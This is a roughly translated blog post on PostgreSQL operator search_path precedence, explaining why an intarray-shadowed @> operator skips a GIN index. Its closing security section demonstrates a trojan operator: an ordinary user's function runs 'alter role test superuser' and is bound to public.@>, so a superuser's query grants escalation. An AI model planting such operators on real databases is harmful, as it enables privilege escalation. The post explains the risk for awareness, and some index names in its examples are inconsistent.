PostgreSQL's homonymous index operator search_path priority introduces a question - why did you suddenly stop indexing? - intarray example

Keywords: Database SQL PostgreSQL

Label

PostgreSQL, intarray, ops, operator, OPERATOR, operator path, search_path, priority

background

Operator is one of the most commonly used elements in database. It always appears in an SQL statement.

select * from tbl where id=1;    

Here = is the operator.

Actually, the underlying operator is still a function, and the operator is a synthesis of functions.

1. PostgreSQL not only allows users to customize functions, but also allows us to customize operators. See the syntax for creating operators.

https://www.postgresql.org/docs/11/static/sql-createoperator.html

2. PostgreSQL also allows users to customize the index interface, so whether the operator can use the index and what index interface can be used can be defined. And there is a corresponding relationship.

https://www.postgresql.org/docs/11/static/sql-createopclass.html

3. PostgreSQL also has a concept of namespace(schema), which means that user-defined objects are placed in namespace. So when we call functions and use operators, which functions and operators are used under the schema?

This depends on the search_path parameter of the database, with default values.

postgres=# show search_path ;    
   search_path       
-----------------    
 "$user", public    
(1 row)    

Usually, the built-in operators, functions and so on are under the schema pg_catalog, which is at the end of the default path.

The problem is coming.

What happens if we create operators with the same name as the built-in operators in the system and are searched first (for example, under user or public)?

Think about their relationship

op    
    
udf    
    
opclass    
    
index    

Let's take an example.

Examples, arrays containing queries, perspectives

Here's an example of how arrays contain queries and perspectives. Accelerate by gin or rum index.

However, in the course of demonstration, the problem of "weird" appeared. Why don't you go index?

1. Generating Random Arrays

create or replace function gen_rand_arr(int,int) returns int[] as $$    
  select array(select (random()*$1)::int from generate_series(1,$2));    
$$ language sql strict;    

2. Create test tables

drop table t1;    
create table t1 (id int, c1 int, arr int[]);    

3. Write 10 million data

insert into t1 select id, random()*100, gen_rand_arr(100,10)     
from generate_series(1,10000000) t(id);    

4. Create an array index (indexing the rum and gin index interfaces, respectively, for testing purposes only)

create index idx_t1_1 on t1 using rum (arr);      
    
create index idx_t1_2 on t1 using gin (arr);      

5. Viewing Sample Data

postgres=# select * from t1 limit 10;    
 id | c1 |               arr                   
----+----+---------------------------------    
  1 |  1 | {64,22,99,58,5,0,75,50,15,100}    
  2 | 83 | {8,81,82,70,86,92,26,4,69,11}    
  3 | 61 | {9,75,61,82,65,54,100,44,54,64}    
  4 | 66 | {53,22,71,54,97,21,69,97,4,77}    
  5 | 78 | {86,47,64,78,72,68,47,83,28,57}    
  6 | 58 | {89,38,23,43,38,67,97,2,33,50}    
  7 | 24 | {4,4,21,25,73,18,29,49,95,15}    
  8 | 96 | {59,93,68,27,40,52,55,97,10,44}    
  9 | 35 | {33,86,73,100,83,76,32,34,0,36}    
 10 | 38 | {21,61,10,39,91,59,34,6,55,93}    
(10 rows)    

6. Use arrays to include queries and check execution plans

postgres=# explain select count(*) from t1 where arr @> array[1,2];    
                           QUERY PLAN                                
-----------------------------------------------------------------    
 Aggregate  (cost=248675.25..248675.26 rows=1 width=8)    
   ->  Seq Scan on t1  (cost=0.00..248457.00 rows=87300 width=0)    
         Filter: (arr @> '{1,2}'::integer[])    
(3 rows)    

Analysis of the Problem of Unguided Index

Why hasn't it been indexed?

The reason is that we used a non-system operator @> because we created the intarray plug-in, which contains the @> operator and is created under public.

This means that when we use @>, we call @> below public, and the @> operator has its own ops, not the default OPS of gin (the default of gin in the system is gin ops of the system).

That's the answer to the mystery:

1. We call the @> added by the intarray plug-in under public, not under pg_catalog.

postgres=# \do @>    
                               List of operators    
   Schema   | Name | Left arg type | Right arg type | Result type | Description     
------------+------+---------------+----------------+-------------+-------------    
 pg_catalog | @>   | aclitem[]     | aclitem        | boolean     | contains    
 pg_catalog | @>   | anyarray      | anyarray       | boolean     | contains  -- Systematic    
 pg_catalog | @>   | anyrange      | anyelement     | boolean     | contains      
 pg_catalog | @>   | anyrange      | anyrange       | boolean     | contains    
 pg_catalog | @>   | box           | box            | boolean     | contains    
 pg_catalog | @>   | box           | point          | boolean     | contains    
 pg_catalog | @>   | circle        | circle         | boolean     | contains    
 pg_catalog | @>   | circle        | point          | boolean     | contains    
 pg_catalog | @>   | jsonb         | jsonb          | boolean     | contains    
 pg_catalog | @>   | path          | point          | boolean     | contains    
 pg_catalog | @>   | polygon       | point          | boolean     | contains    
 pg_catalog | @>   | polygon       | polygon        | boolean     | contains    
 pg_catalog | @>   | tsquery       | tsquery        | boolean     | contains    
 public     | @>   | integer[]     | integer[]      | boolean     | contains  -- intarray Newly added    
(14 rows)    
contrib/intarray/intarray--1.2.sql    
    
    
CREATE OPERATOR @> (    
        LEFTARG = _int4,    
        RIGHTARG = _int4,    
        PROCEDURE = _int_contains,    
        COMMUTATOR = '<@',    
        RESTRICT = _int_contains_sel,    
        JOIN = _int_contains_joinsel    
);    

2. This @> is indexed by itself, but its OPS is not the default OPS of the gin index of the system, but the new gin__int_ops OPS.

contrib/intarray/intarray--1.2.sql    
    
    
CREATE OPERATOR CLASS gin__int_ops    
FOR TYPE _int4 USING gin    
AS    
        OPERATOR        3       &&,    
        OPERATOR        6       = (anyarray, anyarray),    
        OPERATOR        7       @>,    
        OPERATOR        8       <@,    
        OPERATOR        13      @,    
        OPERATOR        14      ~,    
        OPERATOR        20      @@ (_int4, query_int),    
        FUNCTION        1       btint4cmp (int4, int4),    
        FUNCTION        2       ginarrayextract (anyarray, internal, internal),    
        FUNCTION        3       ginint4_queryextract (_int4, internal, int2, internal, internal, internal, internal),    
        FUNCTION        4       ginint4_consistent (internal, int2, _int4, int4, internal, internal, internal, internal),    
        STORAGE         int4;    

3. The index we created uses the default GIN_OPS of the system, so this leads to the problem of our example above. They did not correspond.

How to solve this problem?

Complete operator invocation syntax

Since the database has the concept of SCHEMA, and our custom OP can be renamed under different SCHEMA, how do we call an OP of SCHEMA if we need to call it?

By default, searching OP, including UDF, is determined by the search_path parameter, as mentioned earlier. So we first found the @> operator created by intarray under public, which led to the problem of not leaving the index ahead.

1. Complete Grammar

expression operator expression (binary infix operator)    
operator expression (unary prefix operator)    
expression operator (unary postfix operator)    
    
    
OPERATOR(schema.operatorname)    

In the above case,

1. Method 1. By rewriting the SQL, we can use the index, that is, to tell the database which op we need to call under the schema (corresponding to the ops of the index).

postgres=# explain select count(*) from t1 where arr OPERATOR(public.@>) array[1,2];    
                           QUERY PLAN                                
-----------------------------------------------------------------    
 Aggregate  (cost=248675.25..248675.26 rows=1 width=8)    
   ->  Seq Scan on t1  (cost=0.00..248457.00 rows=87300 width=0)    
         Filter: (arr @> '{1,2}'::integer[])    
(3 rows)    
    
postgres=# explain select count(*) from t1 where arr OPERATOR(pg_catalog.@>) array[1,2];    
                                    QUERY PLAN                                         
-----------------------------------------------------------------------------------    
 Aggregate  (cost=68581.20..68581.21 rows=1 width=8)    
   ->  Bitmap Heap Scan on t1  (cost=986.77..68362.95 rows=87300 width=0)    
         Recheck Cond: (arr OPERATOR(pg_catalog.@>) '{1,2}'::integer[])    
         ->  Bitmap Index Scan on idx_t1_3  (cost=0.00..964.95 rows=87300 width=0)    
               Index Cond: (arr OPERATOR(pg_catalog.@>) '{1,2}'::integer[])    
(5 rows)    

2. Method 2. When creating index, use OPS corresponding to OP.

Delete the original index, change it to the following, or you can keep two index interfaces (of course, we only need one, as long as the OP invoked corresponds to the OPS in INDEX)    
    
drop index idx_t1_3;    
    
create index idx_t1_3 on t1 using gin (arr gin__int_ops);    

Now, in turn, the default public OP goes indexed.

postgres=# explain select count(*) from t1 where arr OPERATOR(public.@>) array[1,2];    
                                    QUERY PLAN                                         
-----------------------------------------------------------------------------------    
 Aggregate  (cost=68581.20..68581.21 rows=1 width=8)    
   ->  Bitmap Heap Scan on t1  (cost=986.77..68362.95 rows=87300 width=0)    
         Recheck Cond: (arr @> '{1,2}'::integer[])    
         ->  Bitmap Index Scan on idx_t1_3  (cost=0.00..964.95 rows=87300 width=0)    
               Index Cond: (arr @> '{1,2}'::integer[])    
(5 rows)    
    
postgres=# explain select count(*) from t1 where arr OPERATOR(pg_catalog.@>) array[1,2];    
                            QUERY PLAN                                
------------------------------------------------------------------    
 Aggregate  (cost=248675.25..248675.26 rows=1 width=8)    
   ->  Seq Scan on t1  (cost=0.00..248457.00 rows=87300 width=0)    
         Filter: (arr OPERATOR(pg_catalog.@>) '{1,2}'::integer[])    
(3 rows)    

Safety Risk Attention

1. Users can define a bunch of OPS under public and renamed under pg_catalog as long as they have permission. When the superuser executes some SQL, (if search_path contains public,) the public.OP created by these users may be used preferentially, leading to security problems.

Ordinary users, for example, weigh in functions.

Example:

Ordinary users create functions and privilege.

postgres=> create or replace function hack(_int4,_int4) returns boolean as $$                  
declare    
begin    
  alter role test superuser; raise notice 'hacked';    
  return $1 operator(pg_catalog.@>) $2;    
end;    
$$ language plpgsql strict security invoker;    
CREATE FUNCTION    

Ordinary users create OP with the same name in pg_catalog under public

postgres=> create operator public.@> (procedure = hack, leftarg='_int4', rightarg='_int4');    
CREATE OPERATOR    

Super user calls this OP, resulting in privilege raising.

postgres=# select * from t1 where arr @> array[1,2] limit 1;    
NOTICE:  hacked    
  
select 1 where array[1,2] @> array[1,2];   

View the effect of the right-raising.

postgres=# \du+ test    
                  List of roles    
 Role name | Attributes | Member of | Description     
-----------+------------+-----------+-------------    
 test      | Superuser  | {}        |     

NOW, test has become a superuser.

Summary

1. op, index, ops should be corresponded, otherwise the problems mentioned in this paper will easily arise in use. Why don't you go indexing?

2. If you need to customize OP, try not to rename it with OP of the system.

3. Security needs to be considered. Ordinary users can use FUNCTION,OP and system FUNCTION,OP rename trap. Because public's path priority is higher than pg_catalog, super users can call this operator, which can lead to privilege raising.

Reference resources

https://www.postgresql.org/docs/11/static/sql-expressions.html#SQL-EXPRESSIONS-OPERATOR-CALLS

https://www.postgresql.org/docs/11/static/intarray.html

Posted by darkvengance on Tue, 30 Apr 2019 06:30:36 -0700